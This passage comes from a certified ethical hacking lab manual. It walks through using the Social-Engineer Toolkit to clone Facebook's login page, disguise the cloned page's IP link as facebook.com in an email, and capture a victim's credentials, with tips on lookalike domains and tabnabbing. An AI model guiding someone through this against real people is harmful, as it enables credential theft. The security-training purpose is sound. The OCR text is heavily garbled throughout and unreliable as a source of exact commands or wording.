a s t. k The M u lt i- A t t a c k method w i l l add a c o m b in a tio n o f a t ta c k s th ro u g h th e web a t t a c Jr menu. F o r exam ple you can u t i l i z e th e Java A p p le t , M e t a s p lo it B ro w s e r, C r e d e n tia l H a rv e s te r/T a b n a b b in g , and th e Man L e f t i n th e M id d le a t t a c k a l l a t once t o see w h ic h i s s u c c e s s f u l. m. 1) Java A p p le t A t ta c k Method 2) M e ta s p lo it B row ser E x p lo i t Method I 3) C r e d e n tia l H a rv e s te r A t ta c k Method | 4) Tabnabbing Attack Method 5) 6) 7) 8) 9) Man l e f t i n t h e M id d le A t ta c k M ethod Web J a c k in g A t ta c k Method M u lt i- A t t a c k Web H e th o l V ic t im Web P r o f i l e r C re a te o r im p o r t a C o d e S ig n in g C e r t i f i c a t e a c k 99) R e tu rn t o M ain Menu U s e t :w e b a tta c k j3 B 1 F IG U R E 3.5: website Attack Vectors menu 7. Now, type 2 and press menu. C E H Lab Manual Page 693 E n te r to select the S i t e C lo n e r option from the Ethical Hacking and Countemieasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.]
    • M odule 09 - S o c ia l Engineering « T e r m in a l File Edit V iew Term inal Help 9 ) C re a te o r im p o r t a C o d e S ig n in g M 99) R e tu rn t o M ain Menu C Q t 1 e Site Cloner is used 1 to done a website o f your choice. s e t : w e b a tta c k >3 The f i r s t m ethod w i l l a llo w SET t o im p o r t‫ *!' ׳‬l i s t o f p r e - d e f in e d web a p p lic a t i o n s t h a t i t can u t i l i z e w i t h i n th e a t t a c k . The second m ethod w i l l c o m p le te ly c lo n e a w e b s ite o f y o u r c h o o s in g and a llo w you t o u t i l i z e th e a t t a c k v e c t o r s w i t h i n th e c o m p le te ly same web a p p lic a t i o n you w e re a t te m p t in g t o c lo n e . I h e t h i r d m ethod a U o w s y o u jt o im p o r t y o u r own w e b s ip ;, n o te t ^ a t you S h o u ld o n ly have a lt' in d e x . h tm l when u s in g th e im p o r t W e b s ite fu n c tio n a lity ^ ^ * Y jF 1) Web T e m p la te s 12) S i t e C lo n e r ! 3) Custom Im p o rt ♦ v I I ^ IV •) / ‫׳‬ ‫י‬ ^ 3 4 - ■ «‫״‬ 99) R e tu rn t o W e b a tta c k Menu ;e t: w e b a tt a c k a E f| _______________ F IG U R E 3.6: Credential Harvester Attack menu Type the of your BackTrack virtual PC 111 the prompt lor IP and press E n te r. 1 1 tins example, the IP is 10.0.0.15 1 IP a d d r e s s a d d r e s s f o r t h e P O S T b a c k in H a r v e s t e r /T a b n a b b i n g * T e r m in a l File Edit V iew Term inal Help COS t 1e tabnabbing attack 1 mediod is used when a victim has multiple tabs open, when the user clicks die link, die victim w ill be presented with a “ Please wait while the page loads” . W hen the victim switches tabs because he/she is multi-tasking, die website detects that a different tab is present and rewrites die webpage to a website you specify. The victim clicks back on the tab after a period o f time and diinks diey were signed out o f their email program or their business application and types the credentials in. W hen the credentials are inserts, diey are harvested and the user is redirected back to the original website. C E H Lab Manual Page 694 a p p lic a t i o n s t h a t i t can u t i l i z e w ith in th e a tta c k . The second m ethod w i l l c o m p le te ly c lo n e a w e b s ite o f y o u r c h o o s in g and a llo w you t o u t i l i z e th e a t t a c k v e c t o r s w i t h i n th e c o m p le te ly same web a p p lic a t i o n you w e re a t te m p t in g t o c lo n e . The t h i r d m ethod a llo w s you t o im p o r t y o u r own w e b s ite , n o te t h a t you s h o u ld o n ly have an in d e x . h tm l when u s in g th e im p o r t w e b s ite f u n c tio n a lit y . 1) Web T e m p la te s 2 ) S i t e C lo n e r 3) Custom Im p o rt _ 1 9 9 ) R e tu rn t o W e b A ta c k Menu J[jL S ‫ ־‬br ir I r3 t - 1 C r e d e n tia l h a r v e s t e r w i l t a llo w you t o u t i l i z e set ‫ן‬ / . * | ' ^ t h e c lo n e c a p a b i l i t i e s w i t h in J [-1 t o h a r v e s t c r e d e n t ia ls o r p a ra m e te rs fro m a w e b s ite as w e ll as p ie c e them in * to a re p o rt [-1 T h is o p t io n i s used f o r w h a t IP th e s e r v e r w i l l POST t o . [ - J I f y o u 'r e u s in g an e x t e r n a l I P , use y o u r e x t e r n a l IP f o r t h i s : > IP address for the POST back in Harvester/Tabnabbina:110. 0.0 . 1s| F IG U R E 3.7: Providing IP address in Harvester/Tabnabbing Now, you will be prompted for a URL to be cloned, type the desired URL for E n t e r t h e u rl t o c l o n e and press E n te r . 1 1 tins example, we 1 have used w w w . f a c e b o o k . c o m . Tins will nntiate the cloning of the specified website. Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.]
    • M odule 09 - S o c ia l Engineering * T e r m in a l File Edit View Term inal Help and a llo w you t o u t i l i z e th e a t t a c k v e c t o r s w i t h i n th e c o m p le te ly same web a p p lic a t i o n you w e re a t te m p t in g t o c l o n e T ^ ^ ^ ^ ^ ^ ^ C Q t 1 e web jacking attack 1 method will create a website clone and present the victim with a link stating that the website has moved. This is a new feature to version 0.7. The t h i r d m ethod a llo w s you t o im p o r t - y m jr own w e b s it e , n o te t h a t you s h o u ld o n ly have an in d e x . h tm l when u s in g t h e im p o r t w e b s ite f u n c tio n a lit y . 1) Web T e m p la te s 2 ) S i t e C lo n e r 3) Custom Im p o rt 99) R e tu rn t o W e b a tta c k Menu [•] : w e b a tta c k >2 — C r e d e n tia l h a r v e s t e r w i l l a llo w you t o u t i l i z e Jr> h a r v e s t [ ‫ ] ־‬to 1 T JT o r p a ra m e te rs t h e c lo n e c a p a b i l i t i e s w i t h i r c r e d e n t ia ls f rom a w e b s ite as w e ll a s p la c e them i r to a re p o rt I ^ ■ % I % ■ I V J 1 a [-] T h is o p t io n i s used f o r | hha t IP th e s e r v e r w i l l POST t o . V ^ [■ ] I f y o u 'r e u s in g an e x t e r n a l IP , use y o u r e x t e r n a l IP f o r t h i s s e t : w e b a tta c k > IP a d d re s s f o r t h e POST back i n H a r v e s te r /T a b n a b b in g :1 0 .0 .0 .1 5 [ • ] SET s u p p o rts b o th HTTP and HTTPS [ - ] Exam ple: h t t p : //w w w . t h i s i s a f a k e s i t e . com____________ ; e t : w e b a tta c k > E n te r th e u r l t o c lo n e :Rvww. fa c e b o o k . com ! M 3r A F IG U R E 3.8: Providing U R L to be cloned 10. Alter cloning is completed, the highlighted message, as shown 111 die following screenshot, will appear on the T e r m in a l screen ot S E T . Press E n te r to continue. 11. It will start Credential Harvester. 1333I f you ’re doing a penetration test, register a name that’s similar to the victim, for Gm ail you could do gmail.com (notice the 1), something similar diat can mistake the user into thinking it’s die legitimate File Edit V iew Term inal Help 99) R e tu rn t o W e b a tta c k Menu s e t : w e b a tta c k >2 [-1 C r e d e n tia l h a r v e s t e r w i l l a llo w you t o u t i l i z e 51 th e c lo n e c a p a b i l i t i e s w i t h i n SET [ - ] t o h a r v e s t c r e d e n t ia ls o r p a ra m e te rs fro m a w e b s ite as w e ll as p la c e them i n to a re p o rt [ - ] T h is o p t io n i s used f o r w h a t IP th e s e r v e r w i l l POST t o . t - J I f y o u 'r e u s in g an e x t e r n a l I P , use y o u r e x t e r n a l IP f o r t h i s s e t : w e b a tta c k > IP a d d re s s f o r th e POST back i n H a rv e s te r /T a b n a b b in g :1 0 .0 .0 .1 5 { - ] SET s u p p o rts b o th HTTP and HTTPS I - ] Exam ple: h t t p : / / w w w . t h is i s a f a k e s it e . c o m I s e t : w e b a tta c k > E n te r t h e u r l t o c lo n e : w w w .fa cebook.com ■ b [*] [* j ‫—ך‬ . C lo n in g th e w e b s ite : h t t p s : / / l o g in . f a c e b o o k . c o m / lo g i n . p h p T h is c o u ld ta k e lit t le b it... 1 I J a Trie b e » « v Ttoaie fteu ■tfm.k i J P re s s < r e t u r i fokc 11 f i e l d s a r e a v a i la b le . R e g a rd le s s , K h i [ ! ] I have read th e above message. -‫י‬ , POSTs on a w e b s ite . t o c o n tin u e F IG U R E 3.9: S E T Website Cloning 12. Leave the Credential Harvester Attack to fetch information from the victim’s machine. C E H Lab Manual Page 695 Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.]
    • M odule 09 - S o c ia l Engineering * Terminal File Edit View Terminal Help m When you hover over the link, die U R L will be presented with the real URL, not the attacker’s machine. So for example if you’re cloning gmail.com, the U R L when hovered over it would be gmail.com. When the user clicks the moved link, Gmail opens and then is quickly replaced with your malicious Webserver. Remember you can change the timing of the webjacking attack in die config/set_config flags. [-] Cred en tial harvester w i l l allow you to u t i l iz e the clone c a p a b ilit ie s w ith in SE T [-] to harvest cred e n tia ls or parameters from a website as w e ll as place them in to a report —— [■] This option i s used fo r what IP the se rv e r w i l l POST to . _ * a * * ' [-] I f you 're using an extern al IP , use your external IP fo r th is s e t :webattack> IP address fo r the POST back in H a r v e s t e r / T a b n a b b in g :lf^ ^ ^ ^ ^ [-] SET supports both HTTP and HTTPS [-1 Example: http://w w w .thisisafakesite.com s e t :webattack> Enter the u r l to clo n e :www.facebook.com [* ] Cloning the w ebsite: https://login.facebook.com /login.php [*j This could take a l i t t l e b i t . . . The beat way to use t h is a t t a c k i » i f f ie ld s f t r g ava ila b le . R e jr d le s s . ■hi l ! ] I have read the above message. Press sername and password torm ftp tu res al POSTs A a webs to continue ‫ ] ׳‬Social-Engineer T o o lk it Cred en tial Harvester A ttack , j Cred en tial Harvester i s running on port 80 ■ Information w i l l be displayed to you as i t a rriv e s below: ] F IG U R E 3.10: SET Credential Harvester Attack 13. N o w , y o u h a v e to s e n d th e IP a d d r e s s o f y o u r B a c k T r a c k m a c h in e to a v ic tim a n d tric k h im o r h e r to c l i c k t o b r o w s e th e I P a d d re s s . 14. F o r tin s d e m o , la u n c h y o u r w e b b r o w s e r 111 th e B a c k T r a c k m a c h in e ; la u n c h y o u r fa v o rite e m a il se rv ic e . 1 1 1 th is e x a m p le w e h a v e u s e d w w w .g m a i l.c o m . L o g in to y o u r g m a il a c c o u n t a n d c o m p o s e a n em ail. 0=5! Most of the time they won’t even notice the IP but it’s just another way to ensure it goes on without a hitch. Now that the victim enters the username and password in die fields, you will notice that we can intercept the credentials now. F IG U R E 3.11: Composing email in Gmail 15. P la c e th e c u r s o r 111 th e b o d y o f t 1 e e m a il w h e r e y o u w is h to p la c e th e fa k e U R L . T h e n , clic k th e L in k C E H Lab Manual Page 696 CO ic o n . Ethical Hacking and Countenneasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.]
    • M odule 09 - S o c ia l Engineering ‫ א‬Compose Mail — ‫־‬ « 9 • >flma1l.com * Gmail • Mozilla Firetox ) Ejle Edit yiew H to flook marks Ipols Help is ry S' ‫^ן‬ f http‫״‬ i google.com/n^il, T C | 121▼ Google Q, |BackTrack Lnux Hotfe nsiwe Security |lExploit‫־‬ DB ^Aircrack-ng J^SomaFM Gmail Documents Calendar More • G 0 v ‫׳‬g le 0 D iscard ° Inbox SUrrwJ Important Sert Mail Drafts ( ) 2 - Lab«h‫־‬ » + Share o Dr f autosaveti at 10:4a A M ( minutes ago) at 0 j@yahoo.com, I Add Cc Add Bcc Su bject @TOI F -Party Pict r s ue A c an tta h o ►C rls ice ‫ ־‬B I y T ‫ ־‬rT * A ‫ ־‬T ‫[ © ־‬oo|t= IE •5 i* 5 ‫יי‬s * ^ 1% • Plain T oxt chock s o l n ■ piig‫״‬ H oilo Sam. PI»4m» c i k t i l n l view U * w # k »11d ( t t p c ure* a TGIF wflh thw cmMxMim* l c h s ik o >♦ » » t vry i t t Regards. m. Search chat or SU' 9 ‫«י‬ F IG U R E 3.12: Linking Fake U R L to Actual U RL 16. 111 th e E d it L in k w in d o w , firs t ty p e d ie a c tu a l a d d re s s 111 th e W e b a d d r e s s fie ld u n d e r th e L in k t o o p ti o n a n d th e n ty p e d ie fa k e U R L 111 d ie T e x t t o d i s p l a y h e ld . 111 th is e x a m p le , th e w e b a d d re s s w e h a v e u s e d is h tt p :/ / 1 0 .0 .0 .1 5 a n d te x t to d is p la y is w w w .f a c e b o o k .c o m / R in i TG IF. C lic k OK ‫־י‬ ‫׳‬ ‫ א‬Compose Mail ‫) ן . ■■■ < » ־‬g)gmail.com - Gmail • Mozilla Firetox ■« ■• ■ tile Edit yiew History flookmarks !pols Help IMC Compose Mail * 3 !5 ‫■ ״‬ |BackTrack Lnux »Rlni Search rap‫• ־‬ ▼ © I f l r Google googie.com ensiwe Security ||Fxploit‫־‬ DB Images Maps Play Q . ^Aircrack-ng j^r >omaFM YouTube G o .)g Ie Dr f eutosaved at 10:45 A M ( minutes ago) at 0 Inbox Starred Important Sent Mai Drafts ( ) 2 Edit Link Crls ice Ur* t . o X Toxt t a e i y L w ( facebook com/Rini TG1f ] Q o ipa: V JunkE-mal To what URL should this link go? 0 Web address |wtp0.0.15 10‫ | ׳־‬Q / C Email ***‫יי•־‬ Th > (‫יז‬IK* I 1| Not » w h ttoput I theboxT rm f t* imgeant et o fat youw n t I k t ( ure r a n hd *■ h *b ar o n o A s a cheroine m t tbe u e u . Then ceoy 1‫ ־‬ate addr s *romt ebox h y u b o s r s cr ot sfl) e es h o r rwe' a r s Q r and p t oi140t obox aoov• dd o o o ot t n | OK | Cancel F IG U R E 3.13: Edit Link window 17. T h e fa k e U R L s h o u ld a p p e a r 111 th e e m a il b o d y , as s h o w n 111 th e fo llo w in g s c r e e n s h o t. C E H Lab Manual Page 697 Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.]
    • M odule 09 - S o c ia l Engineering Ejle Edit ‫ א‬Compose Mail ‫—» ־‬ ......... • (g>gm 1l.com * Gmail • Mozilla Firefox a H to flook marks Ipols Help is ry gBackTrack Linux |*|Offensive Security |[JjExploit-DB ^Aircrack-ng jgjjSomaFM G 0 v ‫׳‬g le Saved c a The Credential Harvester Method will utilize web cloning of a website that has a username and password field and harvest all die information posted to the website. D iscard To Labels•‫־‬ » Dr f autnsaved at 11:01 A M ( minutes ago) at 0 0 ‫־‬ B @yahoo com, Inbox Add Cc Add Bcc SUrred Important Serf Mail Drafts ( ) 2 Subjed ©TGIF- Party Pict r s ue Attach a 1 ‫ת‬ 0 I Sf ‫ ־‬B ►C rls ice U T - »T - A, • T - © oo | - IE 3 is H « =3 ^ , piain roxt chock s o l n ■ piig' Hello Sam. t < 1. l l TfilFjl vtw I * : m Rn o l‫ ״‬I - Pt-*M» c i k t i Ifk www l c h s lij pa l picture a TGIF with th* ceMvttlM ry t Koqaroe. Sa h1 e rc 9 * F IG U R E 3.14: Adding Fake U R L in the email content 18. T o v e rity th a t th e fa k e U R L is lin k e d to d ie a c tu a l U R L , c lick th e fa k e U R L a n d it w ill d is p la y th e a c tu a l U R L as G o t o lin k : w ith th e a c tu a l U R L . S e n d th e e m a il to th e in t e n d e d u se r. • ‫־‬ x Co m p o s e Mail - •• • ipgmml.com - Gmail • Mozilla Firefox File £d 1 yie* History gookmarks !0015 ftelp t M Compose Mail - V 5r' rg| |>|t r.o le Q £ cin , oogle.com A Track Linux |£Offensive Security |lExploit-DB J^Aircrack-ng fefiSomaFM ages Maps Play YouTube G o u g le + Share D iscard Labels» D a t autosaved at 11 0 A M ( minutes ago) rf :1 0 FI 0• @yahoo.c L i some cases when you’re performing an advanced social-engineer attack you may want to register a domain and buy an SSL cert that makes die attack more believable. You can incorporate SSL based attacks with SET. You will need to turn the W EBA TTA C K _SSL to ON. If you want to use self-signed certificates you can as well however there will be an “ untrusted” warning when a victim goes to your website m Inbox Starred Important Serf M s Drafts ( ) 2 Ci c e rls Add Cc Add Bcc Sucject @TGi F - Party P ictures Attach a no ‫מ‬ ■ B I U T • tT * A ‫© • ז ־‬ M jE IE •= 1 ‫ ׳‬M E = 1 /x « Plain Text Check Spelling- JunkE-mal Please c i k t i l n wwv.facebook.CQfr!<Rini TGIF 10 view the wee*end party p c u e a TGIF with the c l b i i s l c h s ik itrs t eerte rpj c c cgrf | to ln. htlp:f/10.0.0.1y -Chanoo Remove y | Go ik F IG U R E 3.15: Actual U R L linked to Fake U RL 19. W h e n th e v ic tim c lick s th e U R L , h e o r sh e w ill b e p r e s e n te d w ith a re p lic a o f F a c e b o o k .c o m 2 0. T h e v ic tim w ill b e e n tic e d to e n te r 111s o r h e r u s e r n a m e a n d p a s s w o r d in to th e f o r m field s as it a p p e a rs to b e a g e n u in e w e b s ite . W h e n th e v ic tim e n te r s th e U s e r n a m e a n d P a s s w o r d a n d click s L o g In, it d o e s n o t a llo w lo g g in g in ; in s te a d , it r e d ire c ts to th e le g itim a te F a c e b o o k lo g in p a g e . O b s e r v e th e U R L in th e b ro w s e r. C E H Lab Manual Page 698 Ethical Hacking and Countenneasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.]
    • M odule 09 - S o c ia l Engineering m H ie multi-attack vector allows you to turn on and off different vectors and combine the attacks all into one specific webpage. So when the user clicks the link he will be targeted by each of the attack vectors you specify. One tiling to note with the attack vector is you can’t utilize Tabnabbing, Cred Harvester, or Web Jacking with the Man Left in the Middle attack. facebook Sign Up Connect and share with the people in your Ife. Tarpbook 1ogin (m or t*h n art o *: Passw ord: ---| 1Keepme lowed in o Sigau for taceto k r p oo Forgoty u o s *v rd o r ss o ? f nit ) cgs‫! ־‬kwo fflOj®Oge =33and Rrtugjes (t = F3Lcb5x S 2012 Moble ‫־‬F n F i n s ‫־‬Eodces Peo l ‫־‬Poqcs A c u Crca* er Ad C id red pe fct reate a Page ‫־‬ Developers Careers ‫־‬P i a y C a s s Terre rvc ote Q log1n > |h c«book m 1<‫ ־‬H C S|hnp3:;;www.face&oolccom/10gm.php| | ^ Do you want Google Chrome to save your password? 1 |Save password Never for this site • < facebook Skjii Up C arM .1 and slur** with the p ip 1 your lit*. u H tM k* 1 1 Facebook Login The multi attack vector utilizes each combination of attacks and allows the user to choose the method for the attack. Once you select one of the attacks, it will be added to your attack profile to be used to stage die attack vector. When you’re finished be sure to select the I ’m finished' option. m Em or Phone; ai | Password: □ Keepme l oggedm c Sum upforTaccbook » Fo g t r u D r o o t »s*crcP C g h(U VMI n la S] Ftctboot e 2012 *In -JI O v/u & j< D « A B£ [xa'd Fwtu«je» OwO M odI ‫ ׳‬h n i n n c ‫ ׳‬B t g c * i d - * d a i c ■«pl« Hg*c - f c t Acu j *1 A ‫ ׳‬d ar r‫ ־‬ab(F n ) arK ra ce C raaca a P*g - ' / cp«rc - ar* r - * v c 4 ‫ _! ׳‬o «c •! r * « L«* L *c !ray ok *r m FIG U R E 3.16: Fake and Legitimate Facebook login page 2 1 . A s s o o n th e v ic tim ty p e s 111 th e e m a il a d d re s s a n d p a s s w o rd , th e S E T T e r m in a l 111 B a c k T r a c k f e tc h e s th e ty p e d u s e r n a m e a n d p a s s w o rd , w h ic h c a n b e u s e d b y a n a tta c k e r to g a m u n a u th o r iz e d a c c e ss to th e v ic tim ’s a c c o u n t. C E H Lab Manual Page 699 Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.]
    • M odule 09 - S o c ia l Engineering * v x Terminal File Edit V iew Term inal Help [ ] Social-Engineer Toolkit Credential Harvester Attack. * [* j Credential Harvester is running on port 80 [ j Information will be displayed to you as i* ‫ ץ ~ - י‬hrl"“‫— ־‬ * -‫״יי‬ 10.0.0.2 - - [26/Sep/2012 11:10:41] “ GET / HTTP/1.1“ 200 [* ] WE GOT A HIT! P rin tin g the output: Social Engineer Toolkit Mass E-Mailer m There are two options on the mass e-mailer; the first would be to send an email to one individual person. The second option will allow you to import a list and send it to as many people as you want within that list. PARAM: PARAM: PARAM: PARAM: PARAM: PARAM: PARAM PARAM PARAM PARAM lsd=AVqgmkGh return session=0 legacy return=l display‫־‬ session key only=0 trynu!n=l charset test=€, timezone=-330 lgnrnd=224034 ArY/U ‫׳‬l € f, 0OSSI POSSIBfe p J ^ n m | F K L D F * % ) : PARAM: default persistent=‫־‬ Q POSSIBLE USERNAME FIELD FOUND: lo«.n=Log+In [ ‫ ] י‬WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT. F IG U R E 3.17: SET found Username and Password 2 2. P re s s C TR L +C to g e n e ra te a r e p o r t t o r th is a tta c k p e rf o rm e d . /v v x Terminal File Edit V iew Term inal Help m The multi-attack will add a combination of attacks through the web attack menu. For example you can utilize the Java Applet, Metasploit Browser, Credential Harvester/Tabnabbing, and the Man Left in the Middle attack all at once to see which is successful. PARAM: PARAM: PARAM: PARAM: PARAM: PARAM: PARAM: PARAM: PARAM: PARAM: lsd=AVqgmkGh return session=0 legacy return=l display‫־‬ session key only=0 trynu1 =l » charset t e s t = € , / K , l € f, tiraezone=-540 Ignrnd=224034 ArYA lgnjs=n POSSIBLE USERNAME FIELD FOUND: emai l ‫•' ׳ — ־‬ POSSIBLE PASSWORD FIELD FOUND: pass=test PARAM: default persistent=0 POSSIBLE USERNAME FIELD FOUND: l 0 gin=L0 g+In [* ] WHEN YOU'RE FIN ISHED -HIT C0N1R0L-C TO GENERATE A REPOftf. C L . I x 'C[*] ftle exported to r Jwkts/20®-09-fc 1 ts/20K-09-26 15::49:15.S4ftl5.lf»L for H IE * r RasnM* w i W I V W l WA V f I X your -‫ך‬ [ ] File in XML format exported t | reports/2012-09-26 15:49:15.5464l^.x • ( j reading pleasure... r Press <retur1 to continue F IG U R E 3.18: Generating Reports through SET L a b A n a ly s is A n a ly ze a n d d o c u m e n t d ie resu lts re la te d to d ie la b exercise. C E H Lab Manual Page 700 Ethical Hacking and Countemieasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.]
    • M odule 09 - S o c ia l Engineering T o o l/U tility I n f o r m a tio n C o ll e c te d / O b j e c ti v e s A c h ie v e d P A R A M : ls d = A V q g m k G 1 1 P A R A M : r e t u r n _ s e s s io n = 0 P A R A M : le g a c y _ re tu r n = 1 P A R A M : d is p la y s P A R A M : s e s s io n _ k e y _ o n ly = 0 S o c ia l P A R A M : tr v n u m = 1 E n g in e e r in g P A R A M : c h a r s e t_ te s t= € ,',€ ,', T o o lk it P A R A M : tim e z o n e = - 5 4 0 P A R A M : lg n r n d = 2 2 4 0 3 4 _ A rY A P A R A M : lg n j s = n e m a 11 = s a m c h o a n g @ y a h o o .c o m p a s s = te s t@ 1 2 3 P L E A S E T A L K T O Y O U R I N S T R U C T O R R E L A T E D T O T H I S I F Y O U H A V E Q U E S T I O N S L A B . Q u e s t io n s 1. E v a lu a te e a c h o f th e fo llo w in g P a ro s p ro x y o p tio n s: a. T ra p R e q u e st b. T ra p R e sp o n se c. C o n tin u e b u tto n d. D r o p b u tto n I n te r n e t C o n n e c tio n R e q u ire d 0 Y es □ No P la tfo rm S u p p o rte d 0 C E H Lab Manual Page 701 C la s s ro o m □ !L a b s Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.]